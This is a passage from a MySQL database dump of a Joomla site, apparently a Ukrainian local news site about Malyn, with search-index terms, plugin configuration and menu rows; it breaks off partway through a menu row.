подарок',0,1,1.5333,'м000',1,'*'),(1689334,'пара подарок','пара подарок',0,1,1.4,'п000',1,'*'),(1689335,'пара подарок від','пара подарок від',0,1,1.5333,'п000',1,'*'),(1689336,'подарок','подарок',0,0,0.4667,'п000',1,'*'),(1689337,'подарок від','подарок від',0,1,1.3667,'п000',1,'*'),(1689338,'подарок від oblako','подарок від oblako',0,1,1.6,'п142',1,'*'),(1689344,'2541','2541',0,0,0.4,'',1,'*'),(1689345,'2541 turetska','2541 turetska',0,1,1.4333,'T632',1,'*'),(1689346,'2541 turetska adana','2541 turetska adana',0,1,1.6333,'T63235',1,'*'),(1689347,'adana turetska 2541','adana turetska 2541',0,1,1.6333,'A353632',1,'*'),(1689348,'turetska 2541','turetska 2541',0,1,1.4333,'T632',1,'*'),(1689349,'turetska 2541 turetska','turetska 2541 turetska',0,1,1.7333,'T6323632',1,'*'),(1689350,'turetska adana','turetska adana',0,1,1.4667,'T63235',1,'*'),(1689351,'турецька адана','турецька адана',0,1,1.4667,'т000',1,'*'),(1689374,'2 2542','2 2542',0,1,1.2,'',1,'*'),(1689375,'2 2542 vikonannya','2 2542 vikonannya',0,1,1.5667,'V250',1,'*'),(1689376,'2021 rik','2021 rik',0,1,1.2667,'R200',1,'*'),(1689377,'2021 рік','2021 рік',0,1,1.2667,'р000',1,'*'),(1689378,'2542','2542',0,0,0.4,'',1,'*'),(1689379,'2542 vikonannya','2542 vikonannya',0,1,1.5,'V250',1,'*'),(1689380,'2542 vikonannya dokhidnoji','2542 vikonannya dokhidnoji',0,1,1.8667,'V2532352',1,'*'),(1689381,'novini 2 2542','novini 2 2542',0,1,1.4333,'N150',1,'*'),(1689382,'oblasti za 2021','oblasti za 2021',0,1,1.5,'O14232',1,'*'),(1689383,'rik','rik',0,0,0.2,'R200',1,'*'),(1689384,'za 2021','za 2021',0,1,1.2333,'Z000',1,'*'),(1689385,'za 2021 rik','za 2021 rik',0,1,1.3667,'Z620',1,'*'),(1689386,'за 2021','за 2021',0,1,1.2333,'з000',1,'*'),(1689387,'за 2021 рік','за 2021 рік',0,1,1.3667,'з000',1,'*'),(1689388,'області за 2021','області за 2021',0,1,1.5,'о000',1,'*'),(1689404,'2 2544','2 2544',0,1,1.2,'',1,'*'),(1689405,'2 2544 vechirne','2 2544 vechirne',0,1,1.5,'V265',1,'*'),(1689406,'2544','2544',0,0,0.4,'',1,'*'),(1689407,'2544 vechirne','2544 vechirne',0,1,1.4333,'V265',1,'*'),(1689408,'2544 vechirne nebo','2544 vechirne nebo',0,1,1.6,'V2651',1,'*'),(1689409,'nad','nad',0,0,0.2,'N300',1,'*'),(1689410,'nad malinom','nad malinom',0,1,1.3667,'N3545',1,'*'),(1689411,'nebo','nebo',0,0,0.2667,'N100',1,'*'),(1689412,'nebo nad','nebo nad',0,1,1.2667,'N153',1,'*'),(1689413,'nebo nad malinom','nebo nad malinom',0,1,1.5333,'N153545',1,'*'),(1689414,'novini 2 2544','novini 2 2544',0,1,1.4333,'N150',1,'*'),(1689415,'vechirne','vechirne',0,0,0.5333,'V265',1,'*'),(1689416,'vechirne nebo','vechirne nebo',0,1,1.4333,'V2651',1,'*'),(1689417,'vechirne nebo nad','vechirne nebo nad',0,1,1.5667,'V265153',1,'*'),(1689418,'вечірнє','вечірнє',0,0,0.4667,'в000',1,'*'),(1689419,'вечірнє небо','вечірнє небо',0,1,1.4,'в000',1,'*'),(1689420,'вечірнє небо над','вечірнє небо над',0,1,1.5333,'в000',1,'*'),(1689421,'над','над',0,0,0.2,'н000',1,'*'),(1689422,'над малином','над малином',0,1,1.3667,'н000',1,'*'),(1689423,'небо','небо',0,0,0.2667,'н000',1,'*'),(1689424,'небо над','небо над',0,1,1.2667,'н000',1,'*'),(1689425,'небо над малином','небо над малином',0,1,1.5333,'н000',1,'*'),(1689435,'2545','2545',0,0,0.4,'',1,'*'),(1689436,'2545 pora','2545 pora',0,1,1.3,'P600',1,'*'),(1689437,'2545 pora na','2545 pora na',0,1,1.4,'P650',1,'*'),(1689438,'holuby pavliny','holuby pavliny',0,1,1.4667,'H4145',1,'*'),(1689439,'holuby pavliny pavychi','holuby pavliny pavychi',0,1,1.7333,'H414512',1,'*'),(1689440,'na snidanok','na snidanok',0,1,1.3667,'N25352',1,'*'),(1689441,'pavliny','pavliny',0,0,0.4667,'P450',1,'*'),(1689442,'pavliny pavychi','pavliny pavychi',0,1,1.5,'P4512',1,'*'),(1689443,'pavliny pavychi 2545','pavliny pavychi 2545',0,1,1.6667,'P4512',1,'*'),(1689444,'pavychi','pavychi',0,0,0.4667,'P200',1,'*'),(1689445,'pavychi 2545','pavychi 2545',0,1,1.4,'P200',1,'*'),(1689446,'pavychi 2545 pora','pavychi 2545 pora',0,1,1.5667,'P216',1,'*'),(1689447,'pora','pora',0,0,0.2667,'P600',1,'*'),(1689448,'pora na','pora na',0,1,1.2333,'P650',1,'*'),(1689449,'pora na snidanok','pora na snidanok',0,1,1.5333,'P6525352',1,'*'),(1689450,'на сніданок','на сніданок',0,1,1.3667,'н000',1,'*'),(1689451,'пора','пора',0,0,0.2667,'п000',1,'*'),(1689452,'пора на','пора на',0,1,1.2333,'п000',1,'*'),(1689453,'пора на сніданок','пора на сніданок',0,1,1.5333,'п000',1,'*'),(1689466,'+380508320922','+380508320922',0,0,1.3,'',1,'*'),(1689467,'+380508320922 telegram','+380508320922 telegram',0,1,1.7333,'T4265',1,'*'),(1689468,'+380508320922 telegram 0508320922','+380508320922 telegram 0508320922',0,1,2,'T4265',1,'*'),(1689469,'2455','2455',0,0,0.4,'',1,'*'),(1689470,'2455 380508320922','2455 380508320922',0,1,1.5667,'',1,'*'),(1689471,'380508320922','380508320922',0,0,1.2,'',1,'*'),(1689472,'porady 2455','porady 2455',0,1,1.3667,'P630',1,'*'),(1689473,'porady 2455 380508320922','porady 2455 380508320922',0,1,1.8,'P630',1,'*'),(1689474,'rizni porady 2455','rizni porady 2455',0,1,1.5667,'R25163',1,'*'),(1689475,'telegram','telegram',0,0,0.5333,'T4265',1,'*'),(1689476,'telegram 0508320922','telegram 0508320922',0,1,1.6333,'T4265',1,'*'),(1689477,'дзвоніть +380508320922','дзвоніть +380508320922',0,1,1.7333,'д000',1,'*'),(1689478,'дзвоніть +380508320922 telegram','дзвоніть +380508320922 telegram',0,1,2,'д34265',1,'*'),(1689479,'житомирська область','житомирська область',0,1,1.6333,'ж000',1,'*'),(1689480,'житомирська область м','житомирська область м',0,1,1.7,'ж000',1,'*'),(1689481,'контактна','контактна',0,0,0.6,'к000',1,'*'),(1689482,'контактна інформація','контактна інформація',0,1,1.6667,'к000',1,'*'),(1689483,'м малин дзвоніть','м малин дзвоніть',0,1,1.5333,'м000',1,'*'),(1689484,'малин дзвоніть','малин дзвоніть',0,1,1.4667,'м000',1,'*'),(1689485,'малин дзвоніть +380508320922','малин дзвоніть +380508320922',0,1,1.9333,'м000',1,'*'),(1689486,'область','область',0,0,0.4667,'о000',1,'*'),(1689487,'область м','область м',0,1,1.3,'о000',1,'*'),(1689488,'область м малин','область м малин',0,1,1.5,'о000',1,'*'),(1689497,'2 2543','2 2543',0,1,1.2,'',1,'*'),(1689498,'2 2543 bezpechne','2 2543 bezpechne',0,1,1.5333,'B2125',1,'*'),(1689499,'2543','2543',0,0,0.4,'',1,'*'),(1689500,'2543 bezpechne','2543 bezpechne',0,1,1.4667,'B2125',1,'*'),(1689501,'2543 bezpechne misto','2543 bezpechne misto',0,1,1.6667,'B212523',1,'*'),(1689502,'bezpechne','bezpechne',0,0,0.6,'B2125',1,'*'),(1689503,'bezpechne misto','bezpechne misto',0,1,1.5,'B212523',1,'*'),(1689504,'bezpechne misto malin','bezpechne misto malin',0,1,1.7,'B212523545',1,'*'),(1689505,'misto','misto',0,0,0.3333,'M230',1,'*'),(1689506,'misto malin','misto malin',0,1,1.3667,'M23545',1,'*'),(1689507,'novini 2 2543','novini 2 2543',0,1,1.4333,'N150',1,'*'),(1689508,'безпечне','безпечне',0,0,0.5333,'б000',1,'*'),(1689509,'безпечне місто','безпечне місто',0,1,1.4667,'б000',1,'*'),(1689510,'безпечне місто малин','безпечне місто малин',0,1,1.6667,'б000',1,'*'),(1689511,'місто малин','місто малин',0,1,1.3667,'м000',1,'*'),(1689512,'2546','2546',0,0,0.4,'',1,'*'),(1689513,'2546 z','2546 z',0,1,1.2,'Z000',1,'*'),(1689514,'2546 z dnem','2546 z dnem',0,1,1.3667,'Z350',1,'*'),(1689515,'dnem sobornosti','dnem sobornosti',0,1,1.5,'D5216523',1,'*'),(1689516,'dnem sobornosti ukrajini','dnem sobornosti ukrajini',0,1,1.8,'D52165232625',1,'*'),(1689517,'sobornosti','sobornosti',0,0,0.6667,'S16523',1,'*'),(1689518,'sobornosti ukrajini','sobornosti ukrajini',0,1,1.6333,'S165232625',1,'*'),(1689519,'video 2546','video 2546',0,1,1.3333,'V300',1,'*'),(1689520,'video 2546 z','video 2546 z',0,1,1.4,'V320',1,'*'),(1689521,'z dnem sobornosti','z dnem sobornosti',0,1,1.5667,'Z35216523',1,'*'),(1689522,'днем соборності','днем соборності',0,1,1.5,'д000',1,'*'),(1689523,'днем соборності україни','днем соборності україни',0,1,1.7667,'д000',1,'*'),(1689524,'з днем соборності','з днем соборності',0,1,1.5667,'з000',1,'*'),(1689525,'соборності','соборності',0,0,0.6667,'с000',1,'*'),(1689526,'соборності україни','соборності україни',0,1,1.6,'с000',1,'*');
/*!40000 ALTER TABLE `fw3gt_finder_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_terms_common`
--

DROP TABLE IF EXISTS `fw3gt_finder_terms_common`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_terms_common` (
  `term` varchar(75) NOT NULL,
  `language` varchar(3) NOT NULL,
  KEY `idx_word_lang` (`term`,`language`),
  KEY `idx_lang` (`language`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_terms_common`
--

LOCK TABLES `fw3gt_finder_terms_common` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_terms_common` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_terms_common` VALUES ('a','en'),('about','en'),('after','en'),('ago','en'),('all','en'),('am','en'),('an','en'),('and','en'),('ani','en'),('any','en'),('are','en'),('aren\'t','en'),('as','en'),('at','en'),('be','en'),('but','en'),('by','en'),('for','en'),('from','en'),('get','en'),('go','en'),('how','en'),('if','en'),('in','en'),('into','en'),('is','en'),('isn\'t','en'),('it','en'),('its','en'),('me','en'),('more','en'),('most','en'),('must','en'),('my','en'),('new','en'),('no','en'),('none','en'),('not','en'),('noth','en'),('nothing','en'),('of','en'),('off','en'),('often','en'),('old','en'),('on','en'),('onc','en'),('once','en'),('onli','en'),('only','en'),('or','en'),('other','en'),('our','en'),('ours','en'),('out','en'),('over','en'),('page','en'),('she','en'),('should','en'),('small','en'),('so','en'),('some','en'),('than','en'),('thank','en'),('that','en'),('the','en'),('their','en'),('theirs','en'),('them','en'),('then','en'),('there','en'),('these','en'),('they','en'),('this','en'),('those','en'),('thus','en'),('time','en'),('times','en'),('to','en'),('too','en'),('true','en'),('under','en'),('until','en'),('up','en'),('upon','en'),('use','en'),('user','en'),('users','en'),('veri','en'),('version','en'),('very','en'),('via','en'),('want','en'),('was','en'),('way','en'),('were','en'),('what','en'),('when','en'),('where','en'),('whi','en'),('which','en'),('who','en'),('whom','en'),('whose','en'),('why','en'),('wide','en'),('will','en'),('with','en'),('within','en'),('without','en'),('would','en'),('yes','en'),('yet','en'),('you','en'),('your','en'),('yours','en');
/*!40000 ALTER TABLE `fw3gt_finder_terms_common` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_tokens`
--

DROP TABLE IF EXISTS `fw3gt_finder_tokens`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_tokens` (
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `weight` float unsigned NOT NULL DEFAULT '1',
  `context` tinyint(1) unsigned NOT NULL DEFAULT '2',
  `language` char(3) NOT NULL DEFAULT '',
  KEY `idx_word` (`term`),
  KEY `idx_context` (`context`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_tokens`
--

LOCK TABLES `fw3gt_finder_tokens` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_tokens` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_finder_tokens` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_tokens_aggregate`
--

DROP TABLE IF EXISTS `fw3gt_finder_tokens_aggregate`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_tokens_aggregate` (
  `term_id` int(10) unsigned NOT NULL,
  `map_suffix` char(1) NOT NULL,
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `term_weight` float unsigned NOT NULL,
  `context` tinyint(1) unsigned NOT NULL DEFAULT '2',
  `context_weight` float unsigned NOT NULL,
  `total_weight` float unsigned NOT NULL,
  `language` char(3) NOT NULL DEFAULT '',
  KEY `token` (`term`),
  KEY `keyword_id` (`term_id`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_tokens_aggregate`
--

LOCK TABLES `fw3gt_finder_tokens_aggregate` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_tokens_aggregate` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_finder_tokens_aggregate` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_types`
--

DROP TABLE IF EXISTS `fw3gt_finder_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_types` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(100) NOT NULL,
  `mime` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `title` (`title`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_types`
--

LOCK TABLES `fw3gt_finder_types` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_types` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_types` VALUES (1,'Tag',''),(2,'Category',''),(3,'Contact',''),(4,'Article',''),(5,'News Feed',''),(6,'Web Link','');
/*!40000 ALTER TABLE `fw3gt_finder_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_gsd`
--

DROP TABLE IF EXISTS `fw3gt_gsd`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_gsd` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(100) NOT NULL,
  `contenttype` varchar(100) NOT NULL,
  `params` text,
  `plugin` varchar(50) NOT NULL DEFAULT '0' COMMENT 'The plugin name of the referenced item',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `language` varchar(7) NOT NULL DEFAULT '*',
  `note` text NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `state` (`state`),
  KEY `plugin` (`plugin`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_gsd`
--

LOCK TABLES `fw3gt_gsd` WRITE;
/*!40000 ALTER TABLE `fw3gt_gsd` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_gsd` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_gsd_config`
--

DROP TABLE IF EXISTS `fw3gt_gsd_config`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_gsd_config` (
  `name` varchar(255) NOT NULL,
  `params` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8 ROW_FORMAT=DYNAMIC COMMENT='Store any configuration in key => params maps';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_gsd_config`
--

LOCK TABLES `fw3gt_gsd_config` WRITE;
/*!40000 ALTER TABLE `fw3gt_gsd_config` DISABLE KEYS */;
INSERT INTO `fw3gt_gsd_config` VALUES ('config','{\"sitename_enabled\":\"1\",\"sitename_name\":\"Malehus info\",\"sitename_name_alt\":\"\\u041c\\u0430\\u043b\\u0435\\u0433\\u0443\\u0441 \\u0456\\u043d\\u0444\\u043e\",\"sitename_url\":\"https:\\/\\/malehus.in.ua\\/\",\"breadcrumbs_enabled\":\"1\",\"include_home\":\"1\",\"breadcrumbs_home\":\"\\u0433\\u043e\\u043b\\u043e\\u0432\\u043d\\u0430\",\"sitelinks_enabled\":\"2\",\"sitelinks_search_custom_url\":\"\",\"logo_file\":\"images\\/stories\\/fotogaleri\\/malyn_nash000003.jpg\",\"socialprofiles_type\":\"Person\",\"socialprofiles_facebook\":\"https:\\/\\/www.facebook.com\\/gans.veber\",\"socialprofiles_twitter\":\"\",\"socialprofiles_instagram\":\"\",\"socialprofiles_youtube\":\"\",\"socialprofiles_linkedin\":\"\",\"socialprofiles_pinterest\":\"\",\"socialprofiles_soundcloud\":\"\",\"socialprofiles_tumblr\":\"\",\"socialprofiles_other\":\"\",\"preparecontent\":\"0\",\"minifyjson\":\"0\",\"desclimit\":\"300\",\"debug\":\"0\",\"show_update_notification\":\"1\",\"customcode\":\"\"}');
/*!40000 ALTER TABLE `fw3gt_gsd_config` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_languages`
--

DROP TABLE IF EXISTS `fw3gt_languages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_languages` (
  `lang_id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0',
  `lang_code` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL,
  `title` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `title_native` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `sef` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `image` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `description` varchar(512) COLLATE utf8mb4_unicode_ci NOT NULL,
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `sitename` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `published` int(11) NOT NULL DEFAULT '0',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`lang_id`),
  UNIQUE KEY `idx_sef` (`sef`),
  UNIQUE KEY `idx_langcode` (`lang_code`),
  KEY `idx_access` (`access`),
  KEY `idx_ordering` (`ordering`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_languages`
--

LOCK TABLES `fw3gt_languages` WRITE;
/*!40000 ALTER TABLE `fw3gt_languages` DISABLE KEYS */;
INSERT INTO `fw3gt_languages` VALUES (1,0,'en-GB','English (UK)','English (UK)','en','en','','','','',1,1,1);
/*!40000 ALTER TABLE `fw3gt_languages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_menu`
--

DROP TABLE IF EXISTS `fw3gt_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_menu` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `menutype` varchar(24) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The type of menu this item belongs to. FK to #__menu_types.menutype',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The display title of the menu item.',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL COMMENT 'The SEF alias of the menu item.',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `path` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The computed path of the menu item based on the alias field.',
  `link` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The actually link the menu item refers to.',
  `type` varchar(16) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The type of link: Component, URL, Alias, Separator',
  `published` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'The published state of the menu link.',
  `parent_id` int(10) unsigned NOT NULL DEFAULT '1' COMMENT 'The parent menu item in the menu tree.',
  `level` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The relative level in the tree.',
  `component_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to #__extensions.id',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to #__users.id',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'The time the menu item was checked out.',
  `browserNav` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'The click behaviour of the link.',
  `access` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The access level required to view the menu item.',
  `img` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The image of the menu item.',
  `template_style_id` int(10) unsigned NOT NULL DEFAULT '0',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded data for the menu item.',
  `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `home` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Indicates if this menu item is the home or default page.',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `client_id` tinyint(4) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_client_id_parent_id_alias_language` (`client_id`,`parent_id`,`alias`(100),`language`),
  KEY `idx_componentid` (`component_id`,`menutype`,`published`,`access`),
  KEY `idx_menutype` (`menutype`),
  KEY `idx_left_right` (`lft`,`rgt`),
  KEY `idx_language` (`language`),
  KEY `idx_alias` (`alias`(100)),
  KEY `idx_path` (`path`(100))
) ENGINE=InnoDB AUTO_INCREMENT=923 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_menu`
--

LOCK TABLES `fw3gt_menu` WRITE;
/*!40000 ALTER TABLE `fw3gt_menu` DISABLE KEYS */;
INSERT INTO `fw3gt_menu` VALUES (1,'','Menu_Item_Root','root','','','','',1,0,0,0,0,'0000-00-00 00:00:00',0,0,'',0,'',0,179,0,'*',0),(2,'main','com_banners','Banners','','Banners','index.php?option=com_banners','component',1,1,1,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',3,12,0,'*',1),(3,'main','com_banners','Banners','','Banners/Banners','index.php?option=com_banners','component',1,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',4,5,0,'*',1),(4,'main','com_banners_categories','Categories','','Banners/Categories','index.php?option=com_categories&extension=com_banners','component',1,2,2,6,0,'0000-00-00 00:00:00',0,0,'class:banners-cat',0,'',6,7,0,'*',1),(5,'main','com_banners_clients','Clients','','Banners/Clients','index.php?option=com_banners&view=clients','component',1,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-clients',0,'',8,9,0,'*',1),(6,'main','com_banners_tracks','Tracks','','Banners/Tracks','index.php?option=com_banners&view=tracks','component',1,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-tracks',0,'',10,11,0,'*',1),(7,'main','com_contact','Contacts','','Contacts','index.php?option=com_contact','component',1,1,1,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',13,18,0,'*',1),(8,'main','com_contact_contacts','Contacts','','Contacts/Contacts','index.php?option=com_contact','component',1,7,2,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',14,15,0,'*',1),(9,'main','com_contact_categories','Categories','','Contacts/Categories','index.php?option=com_categories&extension=com_contact','component',1,7,2,6,0,'0000-00-00 00:00:00',0,0,'class:contact-cat',0,'',16,17,0,'*',1),(10,'main','com_messages','Messaging','','Messaging','index.php?option=com_messages','component',1,1,1,15,0,'0000-00-00 00:00:00',0,0,'class:messages',0,'',19,22,0,'*',1),(11,'main','com_messages_add','New Private Message','','Messaging/New Private Message','index.php?option=com_messages&task=message.add','component',1,10,2,15,0,'0000-00-00 00:00:00',0,0,'class:messages-add',0,'',20,21,0,'*',1),(13,'main','com_newsfeeds','News Feeds','','News Feeds','index.php?option=com_newsfeeds','component',1,1,1,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',23,28,0,'*',1),(14,'main','com_newsfeeds_feeds','Feeds','','News Feeds/Feeds','index.php?option=com_newsfeeds','component',1,13,2,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',24,25,0,'*',1),(15,'main','com_newsfeeds_categories','Categories','','News Feeds/Categories','index.php?option=com_categories&extension=com_newsfeeds','component',1,13,2,6,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds-cat',0,'',26,27,0,'*',1),(16,'main','com_redirect','Redirect','','Redirect','index.php?option=com_redirect','component',1,1,1,24,0,'0000-00-00 00:00:00',0,0,'class:redirect',0,'',33,34,0,'*',1),(17,'main','com_search','Basic Search','','Basic Search','index.php?option=com_search','component',1,1,1,19,0,'0000-00-00 00:00:00',0,0,'class:search',0,'',31,32,0,'*',1),(21,'main','com_finder','Smart Search','','Smart Search','index.php?option=com_finder','component',1,1,1,27,0,'0000-00-00 00:00:00',0,0,'class:finder',0,'',29,30,0,'*',1),(104,'mainmenu','ГОЛОВНА','novini-2','','novini-2','index.php?option=com_content&view=featured','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',58,'{\"featured_categories\":[\"\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"orderby_pri\":\"none\",\"orderby_sec\":\"rdate\",\"order_date\":\"created\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"page_subheading\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',39,40,1,'*',0),(105,'mainmenu','Відомості ','2010-06-05-12-55-45','','2010-06-05-12-55-45','index.php?option=com_content&view=category&layout=blog&id=9','component',-2,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"